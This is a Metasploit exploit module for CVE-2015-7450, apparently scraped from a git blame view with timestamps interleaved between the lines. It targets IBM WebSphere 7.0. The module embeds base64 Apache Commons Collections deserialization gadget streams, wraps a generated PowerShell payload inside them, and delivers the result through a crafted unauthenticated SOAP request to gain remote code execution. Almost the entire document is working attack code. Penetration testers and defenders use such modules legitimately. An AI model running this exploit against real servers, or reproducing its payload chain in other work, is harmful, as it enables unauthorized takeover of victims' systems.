2017-01-03 16:04:51 +02:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2017-01-03 16:04:51 +02:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::Powershell
|
|
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => "IBM WebSphere RCE Java Deserialization Vulnerability",
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
|
|
|
|
|
call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
|
|
|
|
|
remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' => [
|
|
|
|
|
'Liatsis Fotios @liatsisfotios' # Metasploit Module
|
|
|
|
|
|
|
|
|
|
# Thanks for helping me:
|
|
|
|
|
# # # # # # # # # # # #
|
|
|
|
|
|
|
|
|
|
# Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module
|
|
|
|
|
# Dimitriadis Alexios @AlxDm_ # Assistance and code check
|
|
|
|
|
# Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation
|
2017-01-03 16:04:51 +02:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'References' => [
|
|
|
|
|
['CVE', '2015-7450'],
|
|
|
|
|
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
|
|
|
|
|
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
|
|
|
|
|
['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
|
2017-01-03 16:04:51 +02:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' => [
|
|
|
|
|
[ 'IBM WebSphere 7.0.0.0', {} ]
|
2017-01-03 16:04:51 +02:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'DisclosureDate' => '2015-11-06',
|
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DefaultOptions' => {
|
|
|
|
|
'SSL' => true,
|
|
|
|
|
'WfsDelay' => 20
|
2025-06-23 12:00:29 +01:00
|
|
|
},
|
|
|
|
|
'Notes' => {
|
2025-06-23 12:43:46 +01:00
|
|
|
'Reliability' => UNKNOWN_RELIABILITY,
|
|
|
|
|
'Stability' => UNKNOWN_STABILITY,
|
|
|
|
|
'SideEffects' => UNKNOWN_SIDE_EFFECTS
|
2025-06-20 13:20:44 +01:00
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
)
|
2017-01-03 16:04:51 +02:00
|
|
|
|
|
|
|
|
register_options([
|
2017-01-05 12:38:54 +02:00
|
|
|
OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
|
2017-01-03 16:04:51 +02:00
|
|
|
Opt::RPORT('8880')
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
2025-06-20 13:20:44 +01:00
|
|
|
# Decode - Generate - Set Payload / Send SOAP Request
|
|
|
|
|
soap_request(set_payload)
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def set_payload
|
2025-06-20 13:20:44 +01:00
|
|
|
# CommonCollections1 Serialized Streams
|
|
|
|
|
ccs_start = "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQ="
|
|
|
|
|
ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
|
2017-01-03 16:04:51 +02:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
# Generate Payload
|
|
|
|
|
payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
|
|
|
|
|
payload_exec = Rex::Text.encode_base64(payload_exec)
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def invoke_ccs(serialized_stream)
|
2025-06-20 13:20:44 +01:00
|
|
|
# Decode Serialized Streams
|
|
|
|
|
serialized_stream = Rex::Text.decode_base64(serialized_stream)
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def gen_payload
|
2025-06-20 13:20:44 +01:00
|
|
|
# Staging Native Payload
|
|
|
|
|
exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
|
|
|
|
exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
|
2017-01-03 16:04:51 +02:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
# Size up RCE - Buffer
|
|
|
|
|
cmd_lng = exec_cmd.length
|
|
|
|
|
lng2str = "0" + cmd_lng.to_s(16)
|
|
|
|
|
buff = [lng2str].pack("H*")
|
2017-01-03 16:04:51 +02:00
|
|
|
|
2025-06-20 13:20:44 +01:00
|
|
|
rce_pld = buff + exec_cmd
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def soap_request(inject_payload)
|
2025-06-20 13:20:44 +01:00
|
|
|
# SOAP Request
|
|
|
|
|
req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
|
|
|
|
|
req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
|
|
|
|
|
req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
|
|
|
|
|
req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
|
|
|
|
|
req += "</SOAP-ENV:Header>" + "\r\n"
|
|
|
|
|
req += "<SOAP-ENV:Body>" + "\r\n"
|
|
|
|
|
req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
|
|
|
|
|
req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
|
|
|
|
|
req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
|
|
|
|
|
req += "</ns1:getAttribute>" + "\r\n"
|
|
|
|
|
req += "</SOAP-ENV:Body>" + "\r\n"
|
|
|
|
|
req += "</SOAP-ENV:Envelope>" + "\r\n"
|
|
|
|
|
|
|
|
|
|
uri = target_uri.path
|
|
|
|
|
|
|
|
|
|
res = send_request_raw({
|
|
|
|
|
'method' => 'POST',
|
|
|
|
|
'version' => '1.1',
|
|
|
|
|
'raw_headers' => "Content-Type: text/xml; charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
|
|
|
|
|
'uri' => normalize_uri(uri),
|
|
|
|
|
'data' => req
|
|
|
|
|
})
|
2017-01-03 16:04:51 +02:00
|
|
|
end
|
|
|
|
|
end
|
